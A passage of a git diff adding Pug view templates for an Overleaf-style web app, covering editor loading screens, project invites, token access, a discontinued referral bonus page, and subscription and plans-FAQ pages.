data-type="json" content=paywallPlans) +if(isOverleafAssistBundleEnabled) + //- expose plans info to show prices in paywall-change-compile-timeout test + meta(name="ol-addonPrices", data-type="json" content=addonPrices) +// translations for the loading page, before i18n has loaded in the client +meta(name="ol-loadingText", data-type="string" content=translate("loading")) +meta(name="ol-translationIoNotLoaded", data-type="string" content=translate("could_not_connect_to_websocket_server")) +meta(name="ol-translationLoadErrorMessage", data-type="string" content=translate("could_not_load_translations")) +meta(name="ol-translationUnableToJoin", data-type="string" content=translate("could_not_connect_to_collaboration_server")) + +if (settings.overleaf != null) + meta(name="ol-overallThemes" data-type="json" content=overallThemes) + +!= moduleIncludes("editor:meta", locals) diff --git a/services/web/app/views/project/editor/new_from_template.pug b/services/web/app/views/project/editor/new_from_template.pug new file mode 100644 index 0000000..c3b40ce --- /dev/null +++ b/services/web/app/views/project/editor/new_from_template.pug @@ -0,0 +1,37 @@ +extends ../../layout-marketing + +block vars + - var suppressFooter = true + - var suppressCookieBanner = true + - var suppressSkipToContent = true + - bootstrap5PageStatus = 'disabled' + +block content + .editor.full-size + .loading-screen() + .loading-screen-brand-container + .loading-screen-brand( + style="height: 20%;" + ) + + h3.loading-screen-label() #{translate("Opening template")} + span.loading-screen-ellip . + span.loading-screen-ellip . + span.loading-screen-ellip . + + form( + data-ol-regular-form + data-ol-auto-submit + method='POST' + action='/project/new/template/' + ) + input(type="hidden", name="_csrf", value=csrfToken) + input(type="hidden" name="templateId" value=templateId) + input(type="hidden" name="templateVersionId" value=templateVersionId) + input(type="hidden" name="templateName" value=name) + input(type="hidden" name="compiler" value=compiler) + input(type="hidden" name="imageName" value=imageName) + input(type="hidden" name="mainFile" value=mainFile) + if brandVariationId + input(type="hidden" name="brandVariationId" value=brandVariationId) + input(hidden type="submit") diff --git a/services/web/app/views/project/editor/socket_diagnostics.pug b/services/web/app/views/project/editor/socket_diagnostics.pug new file mode 100644 index 0000000..6876e7e --- /dev/null +++ b/services/web/app/views/project/editor/socket_diagnostics.pug @@ -0,0 +1,17 @@ +extends ../../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressGoogleAnalytics = true + - isWebsiteRedesign = 'true' + +block entrypointVar + - entrypoint = 'pages/socket-diagnostics' + +block content + main.content.content-alt#main-content + #socket-diagnostics + +block prepend foot-scripts + script(type="text/javascript", nonce=scriptNonce, src=(wsUrl || '/socket.io') + '/socket.io.js', defer=deferScripts) diff --git a/services/web/app/views/project/ide-react-detached.pug b/services/web/app/views/project/ide-react-detached.pug new file mode 100644 index 0000000..8109da7 --- /dev/null +++ b/services/web/app/views/project/ide-react-detached.pug @@ -0,0 +1,17 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'ide-detached' + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressSkipToContent = true + - var suppressCookieBanner = true + - metadata.robotsNoindexNofollow = true + +block content + #pdf-preview-detached-root() + +block append meta + include editor/_meta diff --git a/services/web/app/views/project/ide-react.pug b/services/web/app/views/project/ide-react.pug new file mode 100644 index 0000000..bc30f69 --- /dev/null +++ b/services/web/app/views/project/ide-react.pug @@ -0,0 +1,28 @@ +extends ../layout-react + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressSkipToContent = true + - var deferScripts = true + - metadata.robotsNoindexNofollow = true + - enableIeeeBranding = false + +block entrypointVar + - entrypoint = 'pages/ide' + +block content + main#ide-root + .loading-screen + .loading-screen-brand-container + .loading-screen-brand(style="height: 20%;") + h3.loading-screen-label #{translate("loading")} + span.loading-screen-ellip . + span.loading-screen-ellip . + span.loading-screen-ellip . + +block append meta + include editor/_meta + +block prepend foot-scripts + script(type="text/javascript", nonce=scriptNonce, src=(wsUrl || '/socket.io') + '/socket.io.js', defer=deferScripts) diff --git a/services/web/app/views/project/invite/not-valid.pug b/services/web/app/views/project/invite/not-valid.pug new file mode 100644 index 0000000..ac3eaed --- /dev/null +++ b/services/web/app/views/project/invite/not-valid.pug @@ -0,0 +1,21 @@ +extends ../../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-8.col-md-offset-2 + .card.project-invite-invalid + .page-header.text-centered + h1 #{translate("invite_not_valid")} + .row.text-center + .col-md-12 + p + | #{translate("invite_not_valid_description")}. + .row.text-center.actions + .col-md-12 + a.btn.btn-secondary-info.btn-secondary(href="/project") #{translate("back_to_your_projects")} + diff --git a/services/web/app/views/project/invite/show.pug b/services/web/app/views/project/invite/show.pug new file mode 100644 index 0000000..8d19a1e --- /dev/null +++ b/services/web/app/views/project/invite/show.pug @@ -0,0 +1,37 @@ +extends ../../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-8.col-md-offset-2 + .card.project-invite-accept + .page-header.text-centered + h1 #{translate("user_wants_you_to_see_project", {username:owner.first_name, projectname:""})} + br + em #{project.name} + .row.text-center + .col-md-12 + p + | #{translate("accepting_invite_as")}  + em #{user.email} + .row + .col-md-12 + form.form( + data-ol-regular-form + method="POST", + action="/project/"+invite.projectId+"/invite/token/"+token+"/accept" + ) + input(name='_csrf', type='hidden', value=csrfToken) + input(name='token', type='hidden', value=token) + .form-group.text-center + button.btn.btn-lg.btn-primary( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("join_project")} + span(hidden data-ol-inflight="pending") #{translate("joining")}… + .form-group.text-center diff --git a/services/web/app/views/project/list-react.pug b/services/web/app/views/project/list-react.pug new file mode 100644 index 0000000..be9233e --- /dev/null +++ b/services/web/app/views/project/list-react.pug @@ -0,0 +1,43 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/project-list' + +block vars + - const suppressNavContentLinks = true + - const suppressNavbar = true + - const suppressFooter = true + +block append meta + meta(name="ol-usersBestSubscription" data-type="json" content=usersBestSubscription) + meta(name="ol-notifications" data-type="json" content=notifications) + meta(name="ol-notificationsInstitution" data-type="json" content=notificationsInstitution) + meta(name="ol-userEmails" data-type="json" content=userEmails) + meta(name="ol-allInReconfirmNotificationPeriods" data-type="json" content=allInReconfirmNotificationPeriods) + meta(name="ol-user" data-type="json" content=user) + meta(name="ol-userAffiliations" data-type="json" content=userAffiliations) + meta(name="ol-reconfirmedViaSAML" content=reconfirmedViaSAML) + meta(name="ol-survey" data-type="json" content=survey) + meta(name="ol-tags" data-type="json" content=tags) + meta(name="ol-portalTemplates" data-type="json" content=portalTemplates) + meta(name="ol-prefetchedProjectsBlob" data-type="json" content=prefetchedProjectsBlob) + if (suggestedLanguageSubdomainConfig) + meta(name="ol-suggestedLanguage" data-type="json" content=Object.assign(suggestedLanguageSubdomainConfig, { + lngName: translate(suggestedLanguageSubdomainConfig.lngCode), + imgUrl: buildImgPath("flags/24/" + suggestedLanguageSubdomainConfig.lngCode + ".png") + })) + meta(name="ol-currentUrl" data-type="string" content=currentUrl) + meta(name="ol-showGroupsAndEnterpriseBanner" data-type="boolean" content=showGroupsAndEnterpriseBanner) + meta(name="ol-groupsAndEnterpriseBannerVariant" data-type="string" content=groupsAndEnterpriseBannerVariant) + meta(name="ol-showInrGeoBanner" data-type="boolean" content=showInrGeoBanner) + meta(name="ol-showBrlGeoBanner" data-type="boolean" content=showBrlGeoBanner) + meta(name="ol-recommendedCurrency" data-type="string" content=recommendedCurrency) + meta(name="ol-showLATAMBanner" data-type="boolean" content=showLATAMBanner) + meta(name="ol-groupSubscriptionsPendingEnrollment" data-type="json" content=groupSubscriptionsPendingEnrollment) + meta(name="ol-hasIndividualRecurlySubscription" data-type="boolean" content=hasIndividualRecurlySubscription) + meta(name="ol-groupSsoSetupSuccess" data-type="boolean" content=groupSsoSetupSuccess) + meta(name="ol-showUSGovBanner" data-type="boolean" content=showUSGovBanner) + meta(name="ol-usGovBannerVariant" data-type="string" content=usGovBannerVariant) + +block content + #project-list-root diff --git a/services/web/app/views/project/token/access-react.pug b/services/web/app/views/project/token/access-react.pug new file mode 100644 index 0000000..83e9f79 --- /dev/null +++ b/services/web/app/views/project/token/access-react.pug @@ -0,0 +1,17 @@ +extends ../../layout-marketing + +block entrypointVar + - entrypoint = 'pages/token-access' + +block vars + - var suppressFooter = true + - var suppressCookieBanner = true + - var suppressSkipToContent = true + +block append meta + meta(name="ol-postUrl" data-type="string" content=postUrl) + meta(name="ol-user" data-type="json" content=user) + +block content + .content.content-alt#main-content + div#token-access-page diff --git a/services/web/app/views/project/token/sharing-updates.pug b/services/web/app/views/project/token/sharing-updates.pug new file mode 100644 index 0000000..a0afb0c --- /dev/null +++ b/services/web/app/views/project/token/sharing-updates.pug @@ -0,0 +1,16 @@ +extends ../../layout-marketing + +block entrypointVar + - entrypoint = 'pages/sharing-updates' + +block vars + - var suppressFooter = true + - var suppressCookieBanner = true + - var suppressSkipToContent = true + +block append meta + meta(name="ol-project_id" data-type="string" content=projectId) + +block content + .content.content-alt#main-content + div#sharing-updates-page diff --git a/services/web/app/views/referal/bonus.pug b/services/web/app/views/referal/bonus.pug new file mode 100644 index 0000000..ecd5a71 --- /dev/null +++ b/services/web/app/views/referal/bonus.pug @@ -0,0 +1,49 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + .content.content-alt#main-content + .container.bonus + .row + .col-md-8.col-md-offset-2 + .card + .container-fluid + .row + .col-md-10.col-md-offset-1 + if (refered_user_count > 0) + p.thanks The Overleaf Bonus Program has been discontinued, but you'll continue to have access to the features you already earned. + else + p.thanks The Overleaf Bonus Program has been discontinued. + p.thanks Please <a href="/contact">contact us</a> if you have any questions. + + if (refered_user_count > 0) + .row.ab-bonus + .col-md-10.col-md-offset-1.bonus-banner(style="position: relative; height: 30px; margin-top: 20px;") + - for (var i = 0; i <= 10; i++) { + if (refered_user_count == i) + .number(style="left: "+i+"0%").active #{i} + else + .number(style="left: "+i+"0%") #{i} + - } + + .row.ab-bonus + .col-md-10.col-md-offset-1.bonus-banner + .progress + .progress-bar.progress-bar-info(style="width: "+refered_user_count+"0%") + + .row.ab-bonus + .col-md-10.col-md-offset-1.bonus-banner(style="position: relative; height: 110px;") + .perk(style="left: 10%;", class = refered_user_count >= 1 ? "active" : "") #{translate("one_free_collab")} + .perk(style="left: 30%;", class = refered_user_count >= 3 ? "active" : "") #{translate("three_free_collab")} + .perk(style="left: 60%;", class = refered_user_count >= 6 ? "active" : "") #{translate("free_dropbox_and_history")} + #{translate("three_free_collab")} + .perk(style="left: 90%;", class = refered_user_count >= 9 ? "active" : "") #{translate("free_dropbox_and_history")} + #{translate("unlimited_collabs")} + .row   + + .row.ab-bonus + .col-md-10.col-md-offset-1.bonus-banner.bonus-status + if (refered_user_count == 1) + p.thanks You’ve introduced <strong>1</strong> person to #{settings.appName}. + else + p.thanks You’ve introduced <strong>#{refered_user_count}</strong> people to #{settings.appName}. diff --git a/services/web/app/views/subscriptions/add-seats.pug b/services/web/app/views/subscriptions/add-seats.pug new file mode 100644 index 0000000..fb04ef9 --- /dev/null +++ b/services/web/app/views/subscriptions/add-seats.pug @@ -0,0 +1,15 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/add-seats' + +block append meta + meta(name="ol-subscriptionData" data-type="json" content=subscriptionData) + meta(name="ol-groupName", data-type="string", content=groupName) + meta(name="ol-subscriptionId", data-type="string", content=subscriptionId) + meta(name="ol-totalLicenses", data-type="number", content=totalLicenses) + meta(name="ol-isProfessional", data-type="boolean", content=isProfessional) + +block content + main.content.content-alt#main-content + #add-seats-root diff --git a/services/web/app/views/subscriptions/canceled-subscription-react.pug b/services/web/app/views/subscriptions/canceled-subscription-react.pug new file mode 100644 index 0000000..3a89234 --- /dev/null +++ b/services/web/app/views/subscriptions/canceled-subscription-react.pug @@ -0,0 +1,10 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/canceled-subscription' + +block append meta + meta(name="ol-user" data-type="json" content=user) + +block content + main.content.content-alt#subscription-canceled-root diff --git a/services/web/app/views/subscriptions/dashboard-react.pug b/services/web/app/views/subscriptions/dashboard-react.pug new file mode 100644 index 0000000..dab505e --- /dev/null +++ b/services/web/app/views/subscriptions/dashboard-react.pug @@ -0,0 +1,34 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/user/subscription/dashboard' + +block head-scripts + script(type="text/javascript", nonce=scriptNonce, src="https://js.recurly.com/v4/recurly.js") + +block append meta + meta(name="ol-subscription" data-type="json" content=personalSubscription) + meta(name="ol-userCanExtendTrial" data-type="boolean" content=userCanExtendTrial) + meta(name="ol-managedGroupSubscriptions" data-type="json" content=managedGroupSubscriptions) + meta(name="ol-memberGroupSubscriptions" data-type="json" content=memberGroupSubscriptions) + meta(name="ol-managedInstitutions" data-type="json" content=managedInstitutions) + meta(name="ol-managedPublishers" data-type="json" content=managedPublishers) + meta(name="ol-planCodesChangingAtTermEnd" data-type="json", content=planCodesChangingAtTermEnd) + meta(name="ol-currentInstitutionsWithLicence" data-type="json" content=currentInstitutionsWithLicence) + meta(name="ol-hasSubscription" data-type="boolean" content=hasSubscription) + meta(name="ol-fromPlansPage" data-type="boolean" content=fromPlansPage) + meta(name="ol-plans" data-type="json" content=plans) + meta(name="ol-groupSettingsAdvertisedFor" data-type="json" content=groupSettingsAdvertisedFor) + meta(name="ol-canUseFlexibleLicensing" data-type="boolean", content=canUseFlexibleLicensing) + meta(name="ol-showGroupDiscount" data-type="boolean", content=showGroupDiscount) + meta(name="ol-groupSettingsEnabledFor" data-type="json" content=groupSettingsEnabledFor) + meta(name="ol-hasAiAssistViaWritefull" data-type="boolean", content=hasAiAssistViaWritefull) + meta(name="ol-user" data-type="json" content=user) + if (personalSubscription && personalSubscription.payment) + meta(name="ol-recurlyApiKey" content=settings.apis.recurly.publicKey) + meta(name="ol-recommendedCurrency" content=personalSubscription.payment.currency) + meta(name="ol-groupPlans" data-type="json" content=groupPlans) + +block content + main.content.content-alt#main-content + #subscription-dashboard-root diff --git a/services/web/app/views/subscriptions/manually-collected-subscription.pug b/services/web/app/views/subscriptions/manually-collected-subscription.pug new file mode 100644 index 0000000..1555ac2 --- /dev/null +++ b/services/web/app/views/subscriptions/manually-collected-subscription.pug @@ -0,0 +1,10 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/manually-collected-subscription' + +block append meta + meta(name="ol-groupName", data-type="string", content=groupName) + +block content + main.content.content-alt#manually-collected-subscription-root diff --git a/services/web/app/views/subscriptions/missing-billing-information.pug b/services/web/app/views/subscriptions/missing-billing-information.pug new file mode 100644 index 0000000..67d13f8 --- /dev/null +++ b/services/web/app/views/subscriptions/missing-billing-information.pug @@ -0,0 +1,10 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/missing-billing-information' + +block append meta + meta(name="ol-groupName", data-type="string", content=groupName) + +block content + main.content.content-alt#missing-billing-information-root diff --git a/services/web/app/views/subscriptions/plans/_faq_new.pug b/services/web/app/views/subscriptions/plans/_faq_new.pug new file mode 100644 index 0000000..baefb6e --- /dev/null +++ b/services/web/app/views/subscriptions/plans/_faq_new.pug @@ -0,0 +1,86 @@ +include ./_plans_faq_tabs +include ../../_mixins/eyebrow + +- var managingYourSubscription = 'managingYourSubscription' +- var overleafIndividualPlans = 'overleafIndividualPlans' +- var overleafGroupPlans = 'overleafGroupPlans' +.plans-faq + .row.row-spaced-extra-large + .col-md-12.faq-heading-container + h2 + +eyebrow(translate("frequently_asked_questions")) + | #{translate("your_questions_answered")} + + .row + .col-xs-12 + div( + class={ + 'plans-faq-tabs': bootstrapVersion === 5, + 'ol-tabs': bootstrapVersion === 5, + 'ol-tabs-scrollable': bootstrapVersion === 3 + } + ) + .nav-tabs-container + ul.nav.nav-tabs(role="tablist") + //- In the bs5 version of plans page, the `active` class need to be added to the `a` tag instead of the parent `li` tag + //- If the `plans-page-bs5` split test has been completed, remove the `active` class from the `li` tag since we're not using it anymore + //- If the `plans-page-bs5` split test has been completed, remove the `data-toggle` because it is not needed anymore (bs5 uses `data-bs-toggle`) + li( + role="presentation" + class={ + active: bootstrapVersion === 3 + } + ) + a( + role="tab" + data-toggle="tab" + data-bs-toggle="tab" + href='#' + managingYourSubscription + aria-controls=managingYourSubscription + class={ + active: bootstrapVersion === 5 + } + ) + | #{translate('managing_your_subscription')} + li(role="presentation") + a( + role="tab" + data-toggle="tab" + data-bs-toggle="tab" + href='#' + overleafIndividualPlans + aria-controls=overleafIndividualPlans + ) + | #{translate('overleaf_individual_plans')} + li(role="presentation") + a( + role="tab" + data-toggle="tab" + data-bs-toggle="tab" + href='#' + overleafGroupPlans + aria-controls=overleafGroupPlans + ) + | #{translate('overleaf_group_plans')} + + .tab-content + .tab-pane.active( + role="tabpanel" + id=managingYourSubscription + ) + +managingYourSubscription() + .tab-pane( + role="tabpanel" + id=overleafIndividualPlans + ) + +overleafIndividualPlans() + .tab-pane( + role="tabpanel" + id=overleafGroupPlans + ) + +overleafGroupPlans() + + .row + .col-xs-12.plans-faq-support + span #{translate('still_have_questions')} + button(data-ol-open-contact-form-modal="general") + span(style="margin-right: 4px") #{translate('contact_support')} + i.icon-md.material-symbols.material-symbols-rounded.material-symbols-arrow-right(aria-hidden="true") arrow_right_alt diff --git a/services/web/app/views/subscriptions/plans/_plans_faq_tabs.pug b/services/web/app/views/subscriptions/plans/_plans_faq_tabs.pug new file mode 100644 index 0000000..f312ebe --- /dev/null +++ b/services/web/app/views/subscriptions/plans/_plans_faq_tabs.pug @@ -0,0 +1,356 @@ +//- If the `plans-page-bs5` split test has been completed, remove the `data-toggle` and `data-target` because it is not needed anymore (bs5 uses `data-bs-toggle` and `data-bs-target`) + +mixin managingYourSubscription() + .ol-accordions-container + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#managingYourSubscriptionQ1" + data-bs-toggle="collapse" + data-bs-target="#managingYourSubscriptionQ1" + aria-expanded="false" + aria-controls="managingYourSubscriptionQ1" + ) + | Can I change plans or cancel later? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="managingYourSubscriptionQ1") + .custom-accordion-body + span Yes, you can do this at any time by going to + strong Account > Subscription + span when logged in to Overleaf. You can change plans, switch between monthly and annual billing options, or cancel to downgrade to the free plan. When canceling, your subscription will continue until the end of the billing period. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#managingYourSubscriptionQ2" + data-bs-toggle="collapse" + data-bs-target="#managingYourSubscriptionQ2" + aria-expanded="false" + aria-controls="managingYourSubscriptionQ2" + ) + | If I change or cancel my Overleaf plan, will I lose my projects? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="managingYourSubscriptionQ2") + .custom-accordion-body + | No. Changing or canceling your plan won’t affect your projects, the only change will be to the features available to you. You can see which features are available only on paid plans in the comparison table. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#managingYourSubscriptionQ3" + data-bs-toggle="collapse" + data-bs-target="#managingYourSubscriptionQ3" + aria-expanded="false" + aria-controls="managingYourSubscriptionQ3" + ) + | Can I pay by invoice or purchase order? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="managingYourSubscriptionQ3") + .custom-accordion-body + | This is possible when you’re purchasing a group subscription for five or more people, or a site license. For individual subscriptions, we can only accept payment online via credit card, debit card, or PayPal. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#managingYourSubscriptionQ4" + data-bs-toggle="collapse" + data-bs-target="#managingYourSubscriptionQ4" + aria-expanded="false" + aria-controls="managingYourSubscriptionQ4" + ) + | How do I view/update the credit card being charged for my subscription? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="managingYourSubscriptionQ4") + .custom-accordion-body + | You can view and update the card on file by going to Account > + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span Subscription + | . + + + + +mixin overleafIndividualPlans() + .ol-accordions-container + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ1" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ1" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ1" + ) + | How does the free trial work? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ1") + .custom-accordion-body + span You get full access to your chosen plan during your 7-day free trial, and there’s no obligation to continue beyond the trial. Your card will be charged at the end of your trial unless you cancel before then. To cancel, go to + strong Account > + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span Subscription + span when logged in to Overleaf (the trial will continue for the full 7 days). + + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ2" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ2" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ2" + ) + | What’s a collaborator on an Overleaf individual subscription? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ2") + .custom-accordion-body + | A collaborator is someone you invite to work with you on a project. So, for example, on our Standard plan you can have up to 10 people collaborating with you on any given project. + + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ3" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ3" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ3" + ) + | The individual Standard plan has 10 project collaborators, does it mean that 10 people will be upgraded? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ3") + .custom-accordion-body + span No. Only the subscriber’s account will be upgraded. An individual Standard subscription allows you to invite 10 people per project to edit the project with you. Your collaborators can access features such as the full document history and extended compile time, but + strong only + span for the project(s) they’re working on with you. If your collaborators want access to those features on their own projects, they will need to purchase their own subscription. (If you work with the same people regularly, you might find a group subscription more cost effective.) + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ4" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ4" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ4" + ) + | Do collaborators also have access to the editing and collaboration features I’ve paid for? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ4") + .custom-accordion-body + span If you have an Overleaf subscription, then your project collaborators will have access to features like real-time track changes and document history, but + strong only + span for the project(s) they’re working on with you. If your collaborators want access to those features on their own projects, they will need to purchase their own subscription. (If you work with the same people regularly, you might find a group subscription more cost effective.) + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ5" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ5" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ5" + ) + | Can I purchase an individual plan on behalf of someone else? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ5") + .custom-accordion-body + | Individual subscriptions must be purchased by the account that will be the end user. If you want to purchase a plan for someone else, you’ll need to provide them with relevant payment details to enable them to make the purchase. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ6" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ6" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ6" + ) + | Who is eligible for the Student plan? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ6") + .custom-accordion-body + | As the name suggests, the Student plan is only for students at educational institutions. This includes graduate students. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafIndividualPlansQ7" + data-bs-toggle="collapse" + data-bs-target="#overleafIndividualPlansQ7" + aria-expanded="false" + aria-controls="overleafIndividualPlansQ7" + ) + | Can I transfer an individual subscription to someone else? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafIndividualPlansQ7") + .custom-accordion-body + | No. Individual plans can’t be transferred. + + + + + +mixin overleafGroupPlans() + .ol-accordions-container + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ1" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ1" + aria-expanded="false" + aria-controls="overleafGroupPlansQ1" + ) + | What’s the difference between users and collaborators on an Overleaf group subscription? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ1") + .custom-accordion-body + div On any of our group plans, the number of users refers to the number of people you can invite to join your group. All of these people will have access to the plan’s paid-for features across all their projects, such as real-time track changes and document history. + div.mt-2 Collaborators are people that your group users may invite to work with them on their projects. So, for example, if you have the Group Standard plan, the users in your group can invite up to 10 people to work with them on a project. And if you have the Group Professional plan, your users can invite as many people to work with them as they want. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ2" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ2" + aria-expanded="false" + aria-controls="overleafGroupPlansQ2" + ) + | What is the benefit of purchasing an Overleaf Group plan? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ2") + .custom-accordion-body + | Our Group subscriptions allow you to purchase access to our premium features for multiple people. They’re easy to manage, help save on paperwork, and allow groups of 5 or more to purchase via purchase order (PO). We also offer discounts on purchases of Group subscriptions for more than 20 users; just get in touch with our + a.inline-green-link( + target="_blank" + href="/for/contact-sales" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span Sales team + | . + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ3" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ3" + aria-expanded="false" + aria-controls="overleafGroupPlansQ3" + ) + | Who is eligible for the educational discount? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ3") + .custom-accordion-body + | The educational discount for group subscriptions is for students or faculty who are using Overleaf primarily for teaching. + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ4" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ4" + aria-expanded="false" + aria-controls="overleafGroupPlansQ4" + ) + | How do I add more licenses to my group subscription, and what will it cost? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ4") + .custom-accordion-body + div + | You can add up to 20 licenses using the + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span subscription management page + | accessed by going to Account > + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span Subscription + | when logged into Overleaf. The cost per license will be prorated at the current per license rate, and will end with your existing renewal date. + div.mt-2 + | If you need more than 20 licenses added to your subscription, please + a.inline-green-link( + target="_blank" + href="/for/contact-sales" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span contact the Sales team + | . + .custom-accordion-item + button.custom-accordion-header.collapsed( + type="button" + data-toggle="collapse" + data-target="#overleafGroupPlansQ5" + data-bs-toggle="collapse" + data-bs-target="#overleafGroupPlansQ5" + aria-expanded="false" + aria-controls="overleafGroupPlansQ5" + ) + | How do I upgrade my plan from Group Standard to Group Professional? + span.custom-accordion-icon + i.material-symbols.material-symbols-outlined(aria-hidden="true") keyboard_arrow_down + .collapse(id="overleafGroupPlansQ5") + .custom-accordion-body + | You can upgrade your plan from Group Standard to Group Professional on the + a.inline-green-link( + target="_blank" + href="/user/subscription" + event-tracking="plans-page-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ button: 'contact', location: 'faq' } + ) + span subscription management page + | . diff --git a/services/web/app/views/subscriptions/preview-change.pug b/services/web/app/views/subscriptions/preview-change.pug new file mode 100644 index 0000000..ab70d2d --- /dev/null +++ b/services/web/app/views/subscriptions/preview-change.pug @@ -0,0 +1,11 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/preview-change' + +block append meta + meta(name="ol-subscriptionChangePreview" data-type="json" content=changePreview) + +block content + main.content.content-alt#main-content + #subscription-preview-change diff --git a/services/web/app/views/subscriptions/subtotal-limit-exceeded.pug 